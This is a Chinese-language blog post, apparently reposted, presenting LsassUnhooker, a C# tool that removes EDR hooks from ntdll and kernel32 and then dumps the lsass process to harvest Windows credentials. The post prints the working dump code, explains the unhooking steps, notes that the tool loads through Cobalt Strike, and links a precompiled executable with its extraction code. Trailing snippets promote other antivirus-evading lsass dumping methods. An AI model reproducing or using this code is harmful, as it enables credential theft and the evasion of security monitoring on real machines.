<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    LsassUnhooker - 一款可用于繞過EDR掛鉤轉儲lsass進程的工具

    一顆小胡椒2022-07-20 08:00:07

    LsassUnhooker

    用C#編寫的小程序可以繞過EDR鉤子并轉儲lsass進程的內容,框架:.NET Framework 4,可以用CobaltStrike execute-assembly加載內存執行,集成至CS插件。

    LsassUnhooker項目地址:

    https://github.com/roberreigada/LsassUnhooker

    SharpUnhooker項目地址:

    https://github.com/GetRektBoy724/SharpUnhooker

    該代碼使用SharpUnhooker項目@GetRektBoy724創建,工作方式如下:

    1. 它使用“PE parser stuff”讀取并復制.text section原始(磁盤中)DLL
    2. 它使用和從D/Invoke修補.text section加載的DLL(以更改內存的權限)Marshal.Copy、NtProtectVirtualMemory
    3. 它通過再次讀取來檢查修補的內存中 DLL,并將其與原始 DLL 進行比較,以查看其是否正確修補。

    通過使用SharpUnhooker和MiniDumpWriteDump函數,我能夠繞過多個EDR并設法在不被發現的情況下轉儲lsass的內容,這是解決問題的代碼:

    SilentUnhooker("ntdll.dll");SilentUnhooker("kernel32.dll");String dumpFileName = Directory.GetCurrentDirectory() + "\\" + "lsass.dmp";if (System.IO.File.Exists(dumpFileName)){  System.IO.File.Delete(dumpFileName);}IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;var proc = Process.GetProcessesByName("lsass").FirstOrDefault();var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);if (result == true) {  Console.WriteLine("lsass process was successfully dumped in " + Directory.GetCurrentDirectory() + "\\" + "lsass.dmp");}else {  Console.WriteLine("Error dumping lsass process");}
    

    已經編譯好的LsassUnhooker.exe文件:

    鏈接:https://pan.baidu.com/s/1VaqGK-FnyvsveN3hrz5XwA

    提取碼:z78j

    lsass
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    LsassUnhooker用C#編寫的小程序可以繞過EDR鉤子并轉儲lsass進程的內容,框架:.NET Framework 4,可以用CobaltStrike?execute-assembly加載內存執行,集成至CS插件。
    lsass.exe(Local Security Authority Subsystem Service進程空間中,存有著機器的域、本地用戶名和密碼等重要信息。
    起因是前兩天看到QAX-Ateam的一篇關于滲透的文章《這是一篇“不一樣”的真實滲透測試案例分析文章》:
    繞過殺軟dump-Lsass內存
    2021-12-02 06:54:18
    dump lsass 進程是我們永遠都逃不過話題,除非微軟那天不用它保存憑據了,自然而然就不dump 它了,抓密碼是滲透重要的環節,是橫向擴展的基礎,接下來講講見到如何繞過殺軟dump lsass內存。
    在滲透測試中,最常用的方法是通過dump進程lsass.exe,從中獲得明文口令和hash,今天分享兩個免殺轉儲lsass方式,目前親測可過某60 or 某絨。在原理上都是使用API MiniDumpWriteDump,通過comsvcs.dll的導出函數MiniDump實現dump內存。
    攻擊者在獲得起始攻擊點后,需要獲取目標主機上的相關憑證,以便通過用戶憑證進行橫向移動。
    可以自行安裝Visual Studio2022,然后訪問路徑,把工具拖出來使用即可,也可以直接在文末獲取下載地址轉儲 LSASS
    能過卡巴、defender等殺軟的dump lsass進程工具,參考代碼鏈接在下面。由minidumpCallback實現,對緩沖區中內存做了些修改后再寫入磁盤,同時做了一些小細節修改。需要注意的是別扔云沙箱,這工具也沒有任何網絡行為。
    后滲透
    2021-10-09 06:35:54
    如果是這種情況,您不能只是轉儲或解析 LSASS,您需要使用類似mimidrv.sys,PPLDump等 使用 Mimikatz 轉儲操作系統憑據
    LSASS 進程加載的 wdigest.dll 模塊有兩個有趣的全局變量
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类